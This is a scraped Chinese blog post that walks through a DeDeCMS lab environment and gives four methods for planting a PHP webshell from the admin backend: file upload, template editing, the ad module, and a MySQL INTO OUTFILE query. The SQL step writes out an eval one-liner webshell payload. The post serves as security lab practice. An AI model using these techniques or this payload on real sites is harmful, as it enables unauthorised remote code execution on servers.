当前位置: 首页 > article >正文

DeDeCMS靶场攻略

搭建环境

一、姿势一  通过文件管理器上传webshell

点击核心,文件式管理器,文件上传

上传文件1.php,里面是一句话木马

上传

上传后去访问一下

访问成功,测试连接

二、姿势二   修改模板文件拿到webshell

点击模板,默认模版管理

下滑找到index.html,点击修改

在文件里添加一句话木马,保存

点击生成,更新主页html

把主页位置修改为../index.php,点击生成静态,更新主页html

访问index.php

测试连接

三、姿势三   后台任意命令执行,拿到webshell

点击模块,广告管理

点击添加一个新广告

在广告内容添加一句话代码

点击确定后,点击代码

找到路径,与站点进行拼接

访问拼接后的网站,访问成功

测试连接

四、姿势四   通过后台sql命令执行拿到webshell

点击系统,sql命令行工具

执行命令select @@basedir,点击确定

出现了MySQL的绝对路径

再用into outfile写入一句话木马,点击确定

select '<?php @eval($_POST[cmd]);?>' into outfile 'F:/phpstudy_pro/WWW/wjf123.php'

访问wjf123.php

访问成功,测试连接


http://www.kler.cn/a/596065.html

相关文章:

  • 使用 5W2H 分析法学习 C 语言理论知识
  • 小科普《DNS服务器》
  • 【Axure高保真原型】增删改饼图
  • Oracle OCP认证是否值得考?
  • unity urp 扭曲效果(半透明物体也可扭曲)
  • Unity—从入门到精通(第一天)
  • 一文了解ThreadLocal
  • bug:uni-file-picker上传图片报错,文件选择器对话框只能在由用户激活时显示,跨域cors
  • Ai客服机器人系统源码
  • redis搭建一主一从+keepalived(虚拟IP)实现高可用
  • 用 pytorch 从零开始创建大语言模型(零):汇总
  • 【css酷炫效果】纯CSS实现悬浮弹性按钮
  • CSS-文本属性1
  • C# HTTP 文件上传、下载服务器
  • v-自定义权限指令与v-if互相影响导致报错Cannot read properties of null (reading ‘insertBefore‘)
  • dcat-admin已完成项目部署注意事项
  • 4(四) Jmeter自动化报表html生成
  • 人工智能在电子信息工程信号处理中的应用调研
  • 抖音用户视频批量下载工具开发全解析
  • Powershell WSL部署ubuntu22.04.5子系统